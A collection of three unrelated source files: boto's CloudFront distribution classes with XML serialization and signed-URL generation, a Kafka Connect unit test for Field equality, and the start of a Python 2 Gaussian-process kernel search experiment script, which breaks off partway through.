from boto.cloudfront.origin import S3Origin, CustomOrigin
from boto.s3.acl import ACL
class DistributionConfig(object):
    """Configuration of a CloudFront distribution, with serialization to
    and from the XML representation used by the CloudFront REST API
    (2010-07-15 schema)."""
    def __init__(self, connection=None, origin=None, enabled=False,
                 caller_reference='', cnames=None, comment='',
                 trusted_signers=None, default_root_object=None,
                 logging=None):
        """
        :param origin: Origin information to associate with the
                       distribution. If your distribution will use
                       an Amazon S3 origin, then this should be an
                       S3Origin object. If your distribution will use
                       a custom origin (non Amazon S3), then this
                       should be a CustomOrigin object.
        :type origin: :class:`boto.cloudfront.origin.S3Origin` or
                      :class:`boto.cloudfront.origin.CustomOrigin`

        :param enabled: Whether the distribution is enabled to accept
                        end user requests for content.
        :type enabled: bool

        :param caller_reference: A unique number that ensures the
                                 request can't be replayed. If no
                                 caller_reference is provided, boto
                                 will generate a type 4 UUID for use
                                 as the caller reference.
        :type caller_reference: str

        :param cnames: A CNAME alias you want to associate with this
                       distribution. You can have up to 10 CNAME aliases
                       per distribution.
        :type cnames: list of str

        :param comment: Any comments you want to include about the
                        distribution.
        :type comment: str

        :param trusted_signers: Specifies any AWS accounts you want to
                                permit to create signed URLs for private
                                content. If you want the distribution to
                                use signed URLs, this should contain a
                                TrustedSigners object; if you want the
                                distribution to use basic URLs, leave
                                this None.
        :type trusted_signers: :class:`boto.cloudfront.signers.TrustedSigners`

        :param default_root_object: Designates a default root object.
                                    Only include a DefaultRootObject value
                                    if you are going to assign a default
                                    root object for the distribution.
        :type default_root_object: str

        :param logging: Controls whether access logs are written for the
                        distribution. If you want to turn on access logs,
                        this should contain a LoggingInfo object; otherwise
                        it should contain None.
        :type logging: :class:`boto.cloudfront.logging.LoggingInfo`
        """
        self.connection = connection
        self.origin = origin
        self.enabled = enabled
        if caller_reference:
            self.caller_reference = caller_reference
        else:
            # Generate a type 4 UUID so the API request cannot be replayed.
            self.caller_reference = str(uuid.uuid4())
        self.cnames = []
        if cnames:
            self.cnames = cnames
        self.comment = comment
        self.trusted_signers = trusted_signers
        self.logging = logging
        self.default_root_object = default_root_object
    def __repr__(self):
        return "DistributionConfig:%s" % self.origin
    def to_xml(self):
        """Serialize this configuration to the XML document expected by
        the CloudFront API.

        NOTE(review): values are interpolated without XML escaping —
        comments/CNAMEs containing ``&`` or ``<`` would produce invalid
        XML; confirm inputs are constrained upstream.
        """
        s = '<?xml version="1.0" encoding="UTF-8"?>\n'
        s += '<DistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
        if self.origin:
            s += self.origin.to_xml()
        s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
        for cname in self.cnames:
            s += ' <CNAME>%s</CNAME>\n' % cname
        if self.comment:
            s += ' <Comment>%s</Comment>\n' % self.comment
        s += ' <Enabled>'
        if self.enabled:
            s += 'true'
        else:
            s += 'false'
        s += '</Enabled>\n'
        if self.trusted_signers:
            s += '<TrustedSigners>\n'
            for signer in self.trusted_signers:
                # 'Self' means the owning AWS account itself.
                if signer == 'Self':
                    s += ' <Self></Self>\n'
                else:
                    s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
            s += '</TrustedSigners>\n'
        if self.logging:
            s += '<Logging>\n'
            s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
            s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
            s += '</Logging>\n'
        if self.default_root_object:
            dro = self.default_root_object
            s += '<DefaultRootObject>%s</DefaultRootObject>\n' % dro
        s += '</DistributionConfig>\n'
        return s
    def startElement(self, name, attrs, connection):
        # XML parsing hook: return a child handler object for nested
        # elements we model, or None to keep handling at this level.
        if name == 'TrustedSigners':
            self.trusted_signers = TrustedSigners()
            return self.trusted_signers
        elif name == 'Logging':
            self.logging = LoggingInfo()
            return self.logging
        elif name == 'S3Origin':
            self.origin = S3Origin()
            return self.origin
        elif name == 'CustomOrigin':
            self.origin = CustomOrigin()
            return self.origin
        else:
            return None
    def endElement(self, name, value, connection):
        # XML parsing hook: store the text of a completed element on the
        # matching attribute; unknown elements are set verbatim.
        if name == 'CNAME':
            self.cnames.append(value)
        elif name == 'Comment':
            self.comment = value
        elif name == 'Enabled':
            if value.lower() == 'true':
                self.enabled = True
            else:
                self.enabled = False
        elif name == 'CallerReference':
            self.caller_reference = value
        elif name == 'DefaultRootObject':
            self.default_root_object = value
        else:
            setattr(self, name, value)
class StreamingDistributionConfig(DistributionConfig):
    """Configuration for a streaming distribution.  Same fields as
    DistributionConfig except there is no default root object, and the
    XML root element differs."""
    def __init__(self, connection=None, origin='', enabled=False,
                 caller_reference='', cnames=None, comment='',
                 trusted_signers=None, logging=None):
        super(StreamingDistributionConfig, self).__init__(connection=connection,
                                                          origin=origin, enabled=enabled,
                                                          caller_reference=caller_reference,
                                                          cnames=cnames, comment=comment,
                                                          trusted_signers=trusted_signers,
                                                          logging=logging)
    def to_xml(self):
        """Serialize to the StreamingDistributionConfig XML document
        expected by the CloudFront API."""
        s = '<?xml version="1.0" encoding="UTF-8"?>\n'
        s += '<StreamingDistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
        if self.origin:
            s += self.origin.to_xml()
        s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
        for cname in self.cnames:
            s += ' <CNAME>%s</CNAME>\n' % cname
        if self.comment:
            s += ' <Comment>%s</Comment>\n' % self.comment
        s += ' <Enabled>'
        if self.enabled:
            s += 'true'
        else:
            s += 'false'
        s += '</Enabled>\n'
        if self.trusted_signers:
            s += '<TrustedSigners>\n'
            for signer in self.trusted_signers:
                if signer == 'Self':
                    s += ' <Self/>\n'
                else:
                    s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
            s += '</TrustedSigners>\n'
        if self.logging:
            s += '<Logging>\n'
            s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
            s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
            s += '</Logging>\n'
        s += '</StreamingDistributionConfig>\n'
        return s
class DistributionSummary(object):
    """Lightweight summary of a distribution as returned by the
    list-distributions API; can fetch the full Distribution on demand."""
    def __init__(self, connection=None, domain_name='', id='',
                 last_modified_time=None, status='', origin=None,
                 cname='', comment='', enabled=False):
        self.connection = connection
        self.domain_name = domain_name
        self.id = id
        self.last_modified_time = last_modified_time
        self.status = status
        self.origin = origin
        self.enabled = enabled
        self.cnames = []
        if cname:
            self.cnames.append(cname)
        self.comment = comment
        self.trusted_signers = None
        self.etag = None
        # True when this summary describes a streaming distribution.
        self.streaming = False
    def __repr__(self):
        return "DistributionSummary:%s" % self.domain_name
    def startElement(self, name, attrs, connection):
        # XML parsing hook: delegate nested elements to child handlers.
        if name == 'TrustedSigners':
            self.trusted_signers = TrustedSigners()
            return self.trusted_signers
        elif name == 'S3Origin':
            self.origin = S3Origin()
            return self.origin
        elif name == 'CustomOrigin':
            self.origin = CustomOrigin()
            return self.origin
        return None
    def endElement(self, name, value, connection):
        # XML parsing hook: map completed element text onto attributes.
        if name == 'Id':
            self.id = value
        elif name == 'Status':
            self.status = value
        elif name == 'LastModifiedTime':
            self.last_modified_time = value
        elif name == 'DomainName':
            self.domain_name = value
        elif name == 'Origin':
            self.origin = value
        elif name == 'CNAME':
            self.cnames.append(value)
        elif name == 'Comment':
            self.comment = value
        elif name == 'Enabled':
            if value.lower() == 'true':
                self.enabled = True
            else:
                self.enabled = False
        elif name == 'StreamingDistributionSummary':
            self.streaming = True
        else:
            setattr(self, name, value)
    def get_distribution(self):
        """Fetch and return the full distribution info for this summary."""
        return self.connection.get_distribution_info(self.id)
class StreamingDistributionSummary(DistributionSummary):
    """DistributionSummary variant that resolves to a streaming
    distribution instead of a standard one."""
    def get_distribution(self):
        """Fetch and return the full streaming distribution info."""
        return self.connection.get_streaming_distribution_info(self.id)
class Distribution(object):
    """A CloudFront distribution: wraps its configuration, exposes
    update/enable/disable/delete operations, S3-backed object helpers,
    and signed-URL generation for private content."""
    def __init__(self, connection=None, config=None, domain_name='',
                 id='', last_modified_time=None, status=''):
        self.connection = connection
        self.config = config
        self.domain_name = domain_name
        self.id = id
        self.last_modified_time = last_modified_time
        self.status = status
        self.in_progress_invalidation_batches = 0
        self.active_signers = None
        self.etag = None
        # Lazily-created S3 bucket handle (see _get_bucket).
        self._bucket = None
        # Key class used when reading objects from the origin bucket.
        self._object_class = Object
    def __repr__(self):
        return "Distribution:%s" % self.domain_name
    def startElement(self, name, attrs, connection):
        # XML parsing hook: delegate nested config/signers elements.
        if name == 'DistributionConfig':
            self.config = DistributionConfig()
            return self.config
        elif name == 'ActiveTrustedSigners':
            self.active_signers = ActiveTrustedSigners()
            return self.active_signers
        else:
            return None
    def endElement(self, name, value, connection):
        # XML parsing hook: map completed element text onto attributes.
        if name == 'Id':
            self.id = value
        elif name == 'LastModifiedTime':
            self.last_modified_time = value
        elif name == 'Status':
            self.status = value
        elif name == 'InProgressInvalidationBatches':
            self.in_progress_invalidation_batches = int(value)
        elif name == 'DomainName':
            self.domain_name = value
        else:
            setattr(self, name, value)
    def update(self, enabled=None, cnames=None, comment=None):
        """
        Update the configuration of the Distribution. The only values
        of the DistributionConfig that can be directly updated are:

         * CNAMES
         * Comment
         * Whether the Distribution is enabled or not

        Any changes to the ``trusted_signers`` or ``origin`` properties of
        this distribution's current config object will also be included in
        the update. Therefore, to set the origin access identity for this
        distribution, set ``Distribution.config.origin.origin_access_identity``
        before calling this update method.

        :type enabled: bool
        :param enabled: Whether the Distribution is active or not.

        :type cnames: list of str
        :param cnames: The DNS CNAME's associated with this
                        Distribution.  Maximum of 10 values.

        :type comment: str or unicode
        :param comment: The comment associated with the Distribution.
        """
        # NOTE(review): the current config's `logging` is NOT carried into
        # the new config here — confirm whether that is intentional.
        new_config = DistributionConfig(self.connection, self.config.origin,
                                        self.config.enabled, self.config.caller_reference,
                                        self.config.cnames, self.config.comment,
                                        self.config.trusted_signers,
                                        self.config.default_root_object)
        if enabled is not None:
            new_config.enabled = enabled
        if cnames is not None:
            new_config.cnames = cnames
        if comment is not None:
            new_config.comment = comment
        self.etag = self.connection.set_distribution_config(self.id, self.etag, new_config)
        self.config = new_config
        self._object_class = Object
    def enable(self):
        """
        Activate the Distribution. A convenience wrapper around
        the update method.
        """
        self.update(enabled=True)
    def disable(self):
        """
        Deactivate the Distribution. A convenience wrapper around
        the update method.
        """
        self.update(enabled=False)
    def delete(self):
        """
        Delete this CloudFront Distribution. The content
        associated with the Distribution is not deleted from
        the underlying Origin bucket in S3.
        """
        self.connection.delete_distribution(self.id, self.etag)
    def _get_bucket(self):
        # Return (creating and caching on first use) the S3 bucket backing
        # this distribution's origin.  Raises for non-S3 origins.
        if isinstance(self.config.origin, S3Origin):
            if not self._bucket:
                bucket_dns_name = self.config.origin.dns_name
                bucket_name = bucket_dns_name.replace('.s3.amazonaws.com', '')
                from boto.s3.connection import S3Connection
                s3 = S3Connection(self.connection.aws_access_key_id,
                                  self.connection.aws_secret_access_key,
                                  proxy=self.connection.proxy,
                                  proxy_port=self.connection.proxy_port,
                                  proxy_user=self.connection.proxy_user,
                                  proxy_pass=self.connection.proxy_pass)
                self._bucket = s3.get_bucket(bucket_name)
                self._bucket.distribution = self
                self._bucket.set_key_class(self._object_class)
            return self._bucket
        else:
            raise NotImplementedError('Unable to get_objects on CustomOrigin')
    def get_objects(self):
        """
        Return a list of all content objects in this distribution.

        :rtype: list of :class:`boto.cloudfront.object.Object`
        :return: The content objects
        """
        bucket = self._get_bucket()
        objs = []
        for key in bucket:
            objs.append(key)
        return objs
    def set_permissions(self, object, replace=False):
        """
        Sets the S3 ACL grants for the given object to the appropriate
        value based on the type of Distribution.  If the Distribution
        is serving private content the ACL will be set to include the
        Origin Access Identity associated with the Distribution.  If
        the Distribution is serving public content the content will
        be set up with "public-read".

        :type object: :class:`boto.cloudfront.object.Object`
        :param object: The Object whose ACL is being set

        :type replace: bool
        :param replace: If False, the Origin Access Identity will be
                        appended to the existing ACL for the object.
                        If True, the ACL for the object will be
                        completely replaced with one that grants
                        READ permission to the Origin Access Identity.
        """
        if isinstance(self.config.origin, S3Origin):
            if self.config.origin.origin_access_identity:
                # The OAI id is the last path segment of the identity string.
                id = self.config.origin.origin_access_identity.split('/')[-1]
                oai = self.connection.get_origin_access_identity_info(id)
                policy = object.get_acl()
                if replace:
                    policy.acl = ACL()
                policy.acl.add_user_grant('READ', oai.s3_user_id)
                object.set_acl(policy)
            else:
                object.set_canned_acl('public-read')
    def set_permissions_all(self, replace=False):
        """
        Sets the S3 ACL grants for all objects in the Distribution
        to the appropriate value based on the type of Distribution.

        :type replace: bool
        :param replace: If False, the Origin Access Identity will be
                        appended to the existing ACL for the object.
                        If True, the ACL for the object will be
                        completely replaced with one that grants
                        READ permission to the Origin Access Identity.
        """
        bucket = self._get_bucket()
        for key in bucket:
            self.set_permissions(key, replace)
    def add_object(self, name, content, headers=None, replace=True):
        """
        Adds a new content object to the Distribution.  The content
        for the object will be copied to a new Key in the S3 Bucket
        and the permissions will be set appropriately for the type
        of Distribution.

        :type name: str or unicode
        :param name: The name or key of the new object.

        :type content: file-like object
        :param content: A file-like object that contains the content
                        for the new object.

        :type headers: dict
        :param headers: A dictionary containing additional headers
                        you would like associated with the new
                        object in S3.

        :rtype: :class:`boto.cloudfront.object.Object`
        :return: The newly created object.
        """
        if self.config.origin.origin_access_identity:
            policy = 'private'
        else:
            policy = 'public-read'
        bucket = self._get_bucket()
        object = bucket.new_key(name)
        object.set_contents_from_file(content, headers=headers, policy=policy)
        if self.config.origin.origin_access_identity:
            self.set_permissions(object, replace)
        return object
    def create_signed_url(self, url, keypair_id,
                          expire_time=None, valid_after_time=None,
                          ip_address=None, policy_url=None,
                          private_key_file=None, private_key_string=None):
        """
        Creates a signed CloudFront URL that is only valid within the specified
        parameters.

        :type url: str
        :param url: The URL of the protected object.

        :type keypair_id: str
        :param keypair_id: The keypair ID of the Amazon KeyPair used to sign
            theURL.  This ID MUST correspond to the private key
            specified with private_key_file or private_key_string.

        :type expire_time: int
        :param expire_time: The expiry time of the URL. If provided, the URL
            will expire after the time has passed. If not provided the URL will
            never expire. Format is a unix epoch.
            Use int(time.time() + duration_in_sec).

        :type valid_after_time: int
        :param valid_after_time: If provided, the URL will not be valid until
            after valid_after_time. Format is a unix epoch.
            Use int(time.time() + secs_until_valid).

        :type ip_address: str
        :param ip_address: If provided, only allows access from the specified
            IP address.  Use '192.168.0.10' for a single IP or
            use '192.168.0.0/24' CIDR notation for a subnet.

        :type policy_url: str
        :param policy_url: If provided, allows the signature to contain
            wildcard globs in the URL.  For example, you could
            provide: 'http://example.com/media/\*' and the policy
            and signature would allow access to all contents of
            the media subdirectory.  If not specified, only
            allow access to the exact url provided in 'url'.

        :type private_key_file: str or file object.
        :param private_key_file: If provided, contains the filename of the
            private key file used for signing or an open
            file object containing the private key
            contents.  Only one of private_key_file or
            private_key_string can be provided.

        :type private_key_string: str
        :param private_key_string: If provided, contains the private key string
            used for signing. Only one of private_key_file or
            private_key_string can be provided.

        :rtype: str
        :return: The signed URL.
        """
        # Get the required parameters
        params = self._create_signing_params(
            url=url, keypair_id=keypair_id, expire_time=expire_time,
            valid_after_time=valid_after_time, ip_address=ip_address,
            policy_url=policy_url, private_key_file=private_key_file,
            private_key_string=private_key_string)

        #combine these into a full url
        if "?" in url:
            sep = "&"
        else:
            sep = "?"
        signed_url_params = []
        for key in ["Expires", "Policy", "Signature", "Key-Pair-Id"]:
            if key in params:
                param = "%s=%s" % (key, params[key])
                signed_url_params.append(param)
        signed_url = url + sep + "&".join(signed_url_params)
        return signed_url
    def _create_signing_params(self, url, keypair_id,
                               expire_time=None, valid_after_time=None,
                               ip_address=None, policy_url=None,
                               private_key_file=None, private_key_string=None):
        """
        Creates the required URL parameters for a signed URL.
        """
        params = {}
        # Check if we can use a canned policy
        if expire_time and not valid_after_time and not ip_address and not policy_url:
            # we manually construct this policy string to ensure formatting
            # matches signature
            policy = self._canned_policy(url, expire_time)
            params["Expires"] = str(expire_time)
        else:
            # If no policy_url is specified, default to the full url.
            if policy_url is None:
                policy_url = url
            # Can't use canned policy
            policy = self._custom_policy(policy_url, expires=expire_time,
                                         valid_after=valid_after_time,
                                         ip_address=ip_address)
            encoded_policy = self._url_base64_encode(policy)
            params["Policy"] = encoded_policy
        #sign the policy
        signature = self._sign_string(policy, private_key_file, private_key_string)
        #now base64 encode the signature (URL safe as well)
        encoded_signature = self._url_base64_encode(signature)
        params["Signature"] = encoded_signature
        params["Key-Pair-Id"] = keypair_id
        return params
    @staticmethod
    def _canned_policy(resource, expires):
        """
        Creates a canned policy string.
        """
        # Hand-built JSON so the byte layout exactly matches what gets
        # signed (no whitespace differences from a serializer).
        policy = ('{"Statement":[{"Resource":"%(resource)s",'
                  '"Condition":{"DateLessThan":{"AWS:EpochTime":'
                  '%(expires)s}}}]}' % locals())
        return policy
    @staticmethod
    def _custom_policy(resource, expires=None, valid_after=None, ip_address=None):
        """
        Creates a custom policy string based on the supplied parameters.
        """
        condition = {}
        # SEE: http://docs.amazonwebservices.com/AmazonCloudFront/latest/DeveloperGuide/RestrictingAccessPrivateContent.html#CustomPolicy
        # The 'DateLessThan' property is required.
        if not expires:
            # Defaults to ONE day
            expires = int(time.time()) + 86400
        condition["DateLessThan"] = {"AWS:EpochTime": expires}
        if valid_after:
            condition["DateGreaterThan"] = {"AWS:EpochTime": valid_after}
        if ip_address:
            # A bare IP becomes a /32 (single-host) CIDR.
            if '/' not in ip_address:
                ip_address += "/32"
            condition["IpAddress"] = {"AWS:SourceIp": ip_address}
        policy = {"Statement": [{
            "Resource": resource,
            "Condition": condition}]}
        # Compact separators: no whitespace may differ from the signed bytes.
        return json.dumps(policy, separators=(",", ":"))
    @staticmethod
    def _sign_string(message, private_key_file=None, private_key_string=None):
        """
        Signs a string for use with Amazon CloudFront.
        Requires the rsa library be installed.
        """
        try:
            import rsa
        except ImportError:
            raise NotImplementedError("Boto depends on the python rsa "
                                      "library to generate signed URLs for "
                                      "CloudFront")
        # Make sure only one of private_key_file and private_key_string is set
        if private_key_file and private_key_string:
            raise ValueError("Only specify the private_key_file or the private_key_string not both")
        if not private_key_file and not private_key_string:
            raise ValueError("You must specify one of private_key_file or private_key_string")
        # If private_key_file is a file name, open it and read it
        if private_key_string is None:
            if isinstance(private_key_file, six.string_types):
                with open(private_key_file, 'r') as file_handle:
                    private_key_string = file_handle.read()
            # Otherwise, treat it like a file
            else:
                private_key_string = private_key_file.read()
        # Sign it!
        # NOTE(review): str(message) and rsa.sign on a text key assume a
        # Python 2 str; on Python 3 rsa.sign requires bytes — verify the
        # target runtime before relying on this path.
        private_key = rsa.PrivateKey.load_pkcs1(private_key_string)
        signature = rsa.sign(str(message), private_key, 'SHA-1')
        return signature
    @staticmethod
    def _url_base64_encode(msg):
        """
        Base64 encodes a string using the URL-safe characters specified by
        Amazon.
        """
        # NOTE(review): on Python 3, b64encode returns bytes, so these
        # str.replace calls would raise — this code assumes Python 2.
        msg_base64 = base64.b64encode(msg)
        msg_base64 = msg_base64.replace('+', '-')
        msg_base64 = msg_base64.replace('=', '_')
        msg_base64 = msg_base64.replace('/', '~')
        return msg_base64
class StreamingDistribution(Distribution):
    """Distribution variant for streaming (RTMP) content: parses a
    StreamingDistributionConfig and uses StreamingObject keys."""
    def __init__(self, connection=None, config=None, domain_name='',
                 id='', last_modified_time=None, status=''):
        super(StreamingDistribution, self).__init__(connection, config,
                                                    domain_name, id, last_modified_time, status)
        self._object_class = StreamingObject
    def startElement(self, name, attrs, connection):
        # XML parsing hook: intercept the streaming config element,
        # delegate everything else to the base class.
        if name == 'StreamingDistributionConfig':
            self.config = StreamingDistributionConfig()
            return self.config
        else:
            return super(StreamingDistribution, self).startElement(name, attrs,
                                                                   connection)
    def update(self, enabled=None, cnames=None, comment=None):
        """
        Update the configuration of the StreamingDistribution.  The only values
        of the StreamingDistributionConfig that can be directly updated are:

         * CNAMES
         * Comment
         * Whether the Distribution is enabled or not

        Any changes to the ``trusted_signers`` or ``origin`` properties of
        this distribution's current config object will also be included in
        the update. Therefore, to set the origin access identity for this
        distribution, set
        ``StreamingDistribution.config.origin.origin_access_identity``
        before calling this update method.

        :type enabled: bool
        :param enabled: Whether the StreamingDistribution is active or not.

        :type cnames: list of str
        :param cnames: The DNS CNAME's associated with this
                        Distribution.  Maximum of 10 values.

        :type comment: str or unicode
        :param comment: The comment associated with the Distribution.
        """
        new_config = StreamingDistributionConfig(self.connection,
                                                 self.config.origin,
                                                 self.config.enabled,
                                                 self.config.caller_reference,
                                                 self.config.cnames,
                                                 self.config.comment,
                                                 self.config.trusted_signers)
        if enabled is not None:
            new_config.enabled = enabled
        if cnames is not None:
            new_config.cnames = cnames
        if comment is not None:
            new_config.comment = comment
        self.etag = self.connection.set_streaming_distribution_config(self.id,
                                                                      self.etag,
                                                                      new_config)
        self.config = new_config
        self._object_class = StreamingObject
    def delete(self):
        """Delete this streaming distribution from CloudFront."""
        self.connection.delete_streaming_distribution(self.id, self.etag)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.data;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNotEquals;
public class FieldTest {
    /**
     * Field equality must take all three components into account: two fields
     * are equal only when name, index and schema all match, and changing any
     * single component must break equality.
     */
    @Test
    public void testEquality() {
        Field field1 = new Field("name", 0, Schema.INT8_SCHEMA);
        Field field2 = new Field("name", 0, Schema.INT8_SCHEMA);
        // Each of these differs from field1 in exactly one component.
        Field differentName = new Field("name2", 0, Schema.INT8_SCHEMA);
        Field differentIndex = new Field("name", 1, Schema.INT8_SCHEMA);
        Field differentSchema = new Field("name", 0, Schema.INT16_SCHEMA);
        assertEquals(field1, field2);
        assertNotEquals(field1, differentName);
        assertNotEquals(field1, differentIndex);
        assertNotEquals(field1, differentSchema);
    }
}
|
java
|
github
|
https://github.com/apache/kafka
|
connect/api/src/test/java/org/apache/kafka/connect/data/FieldTest.java
|
'''
Created on Nov 2012
@authors: James Robert Lloyd (jrl44@cam.ac.uk)
David Duvenaud (dkd23@cam.ac.uk)
Roger Grosse (rgrosse@mit.edu)
'''
import flexiblekernel as fk
import grammar
import gpml
import utils.latex
import numpy as np
import pylab
import scipy.io
import sys
import os
from job_controller import *
import flexiblekernel as fk
from flexiblekernel import ScoredKernel
import grammar
import gpml
import utils.latex
import utils.fear
from config import *
from utils import gaussians, psd_matrices
import numpy as np
nax = np.newaxis
import pylab
import scipy.io
import sys
import os
import tempfile
import subprocess
import time
import cblparallel
from cblparallel.util import mkstemp_safe
import re
import shutil
import random
def kernel_test():
    '''Smoke test: build a masked SqExp kernel and print its GPML expression,
    pretty-printed form and parameter vector.'''
    k = fk.MaskKernel(4, 3, fk.SqExpKernel(0, 0))
    print k.gpml_kernel_expression()
    print k.pretty_print()
    print '[%s]' % k.param_vector()
    print 'kernel_test complete'
def base_kernel_test():
    '''Smoke test: pretty-print every 1-D base kernel the library defines.'''
    print [k.pretty_print() for k in fk.base_kernels(1)]
    print 'base_kernel_test complete'
def expand_test():
    '''Expand a 1-D sum kernel through the grammar and show the expansion
    before and after duplicate removal.'''
    k1 = fk.SqExpKernel(1, 1)
    k2 = fk.SqExpPeriodicKernel(2, 2, 2)
    e = fk.SumKernel([k1, k2])
    g = grammar.OneDGrammar()
    print ''
    for f in grammar.expand(e, g):
        #print f
        # Show each expansion next to its canonical form.
        print f.pretty_print()
        print grammar.canonical(f).pretty_print()
        print
    print ' ***** duplicates removed *****'
    print
    kernels = grammar.expand(e, g)
    for f in grammar.remove_duplicates(kernels):
        print f.pretty_print()
        print
    print '%d originally, %d without duplicates' % (len(kernels), len(grammar.remove_duplicates(kernels)))
    print 'expand_test complete'
def expand_test2():
    '''Same as expand_test but in 2 dimensions with masked per-dimension
    kernels and the multi-dimensional grammar.'''
    k1 = fk.MaskKernel(2, 0, fk.SqExpKernel(1, 1))
    k2 = fk.MaskKernel(2, 1, fk.SqExpPeriodicKernel(2, 2, 2))
    e = fk.SumKernel([k1, k2])
    g = grammar.MultiDGrammar(2)
    print ''
    for f in grammar.expand(e, g):
        print f.pretty_print()
        print grammar.canonical(f).pretty_print()
        print
    print ' ***** duplicates removed *****'
    print
    kernels = grammar.expand(e, g)
    for f in grammar.remove_duplicates(kernels):
        print f.pretty_print()
        print
    print '%d originally, %d without duplicates' % (len(kernels), len(grammar.remove_duplicates(kernels)))
    print 'expand_test complete'
def load_mauna():
    '''Load the 2011 Mauna dataset; returns the (X, y) arrays.'''
    contents = scipy.io.loadmat('../data/mauna.mat')
    return contents['X'], contents['y']
def load_mauna_original():
    """
    Original Mauna dataset made to match the experiments from Carl's book.
    For details, see data/preprocess_mauna_2004.m

    Returns the (X, y) arrays stored in the .mat file.
    """
    contents = scipy.io.loadmat('../data/mauna2003.mat')
    return contents['X'], contents['y']
def call_gpml_test():
    '''Optimise a simple sum-of-SqExp kernel on a subsampled Mauna dataset
    from 15 random restarts and report the restarts sorted by NLL.'''
    np.random.seed(0)
    k = fk.SumKernel([fk.SqExpKernel(0, 0), fk.SqExpKernel(0, 0)])
    print k.gpml_kernel_expression()
    print k.pretty_print()
    print '[%s]' % k.param_vector()
    X, y = load_mauna()
    # Keep only the first third of the data to speed the test up.
    N_orig = X.shape[0]
    X = X[:N_orig//3, :]
    y = y[:N_orig//3, :]
    results = []
    pylab.figure()
    for i in range(15):
        # Each restart draws fresh random initial hyperparameters.
        init_params = np.random.normal(size=k.param_vector().size)
        #kernel_hypers, nll, nlls = gpml.optimize_params(k.gpml_kernel_expression(), k.param_vector(), X, y, return_all=True)
        kernel_hypers, nll, nlls = gpml.optimize_params(k.gpml_kernel_expression(), init_params, X, y, return_all=True)
        print "kernel_hypers =", kernel_hypers
        print "nll =", nll
        k_opt = k.family().from_param_vector(kernel_hypers)
        print k_opt.gpml_kernel_expression()
        print k_opt.pretty_print()
        print '[%s]' % k_opt.param_vector()
        # Overlay the optimisation trace of this restart.
        pylab.semilogx(range(1, nlls.size+1), nlls)
        results.append((kernel_hypers, nll))
        pylab.draw()
    print
    print
    # Report restarts from best (lowest NLL) to worst.
    results = sorted(results, key=lambda p: p[1])
    for kernel_hypers, nll in results:
        print nll, kernel_hypers
    print "done"
def sample_mauna_best():
    '''Draw and plot one GP prior sample under the best kernel found for the
    Mauna dataset.'''
    # This kernel was chosen from a run of Mauna datapoints.
    kernel = ( fk.SqExpKernel(-0.7, -1.3) + fk.SqExpKernel(4.8, 2.3) ) * \
             ( fk.SqExpKernel(3.0, 0.5) + fk.SqExpPeriodicKernel(0.4, -0.0, -0.9) )
    X = np.linspace(0,50,500)
    # Todo: set random seed.
    sample = gpml.sample_from_gp_prior(kernel, X)
    pylab.figure()
    pylab.plot(X, sample)
    pylab.title('( SqExp(ell=-0.7, sf=-1.3) + SqExp(ell=4.8, sf=2.3) ) \n x ( SqExp(ell=3.0, sf=0.5) + Periodic(ell=0.4, p=-0.0, sf=-0.9) )')
def sample_Carls_kernel():
    '''Draw and plot one GP prior sample under Carl's Mauna Loa kernel.'''
    kernel = fk.Carls_Mauna_kernel()
    X = np.linspace(0, 50, 500)
    # Todo: set random seed so the drawn sample is reproducible.
    sample = gpml.sample_from_gp_prior(kernel, X)
    pylab.figure()
    pylab.plot(X, sample)
    # Bug fix: 'Carl''s kernel' is Python adjacent-string concatenation and
    # rendered as "Carls kernel" (MATLAB-style quote escaping doesn't apply
    # in Python); escape the apostrophe instead.
    pylab.title('Carl\'s kernel')
def compare_kernels_experiment():
    '''Optimise Carl's hand-built Mauna kernel and our discovered kernel on
    the same subsampled data and print both NLLs for comparison.'''
    kernel1 = fk.Carls_Mauna_kernel()
    kernel2 = ( fk.SqExpKernel(-0.7, -1.3) + fk.SqExpKernel(4.8, 2.3) ) * \
              ( fk.SqExpKernel(3.0, 0.5) + fk.SqExpPeriodicKernel(0.4, -0.0, -0.9) )
    #kernel2 = ( SqExp(ell=-0.8, sf=-1.4) + Periodic(ell=0.5, p=-0.3, sf=-1.1) + RQ(ell=1.9, sf=1.6, a=0.2) + ( SqExp(ell=4.5, sf=1.0) x Periodic(ell=0.6, p=-0.0, sf=0.1) ) )
    X, y = load_mauna_original()
    N_orig = X.shape[0] # subsample data.
    X = X[:N_orig//5, :]
    y = y[:N_orig//5, :]
    print "Carl's kernel"
    print kernel1.pretty_print()
    # Both kernels are optimised with the same fixed noise level and budget.
    kernel_hypers1, nll1 = gpml.optimize_params(kernel1.gpml_kernel_expression(), kernel1.param_vector(), \
                                                X, y, noise=np.log(0.19), iters=100 )
    k1_opt = kernel1.family().from_param_vector(kernel_hypers1)
    print k1_opt.pretty_print()
    print "Carl's NLL =", nll1
    print "Our kernel"
    print kernel2.pretty_print()
    kernel_hypers2, nll2 = gpml.optimize_params(kernel2.gpml_kernel_expression(), kernel2.param_vector(), \
                                                X, y, noise=np.log(0.19), iters=100)
    k2_opt = kernel2.family().from_param_vector(kernel_hypers2)
    print k2_opt.pretty_print()
    print "Our NLL =", nll2
def simple_mauna_experiment():
    '''A first version of an experiment learning kernels: greedy beam search
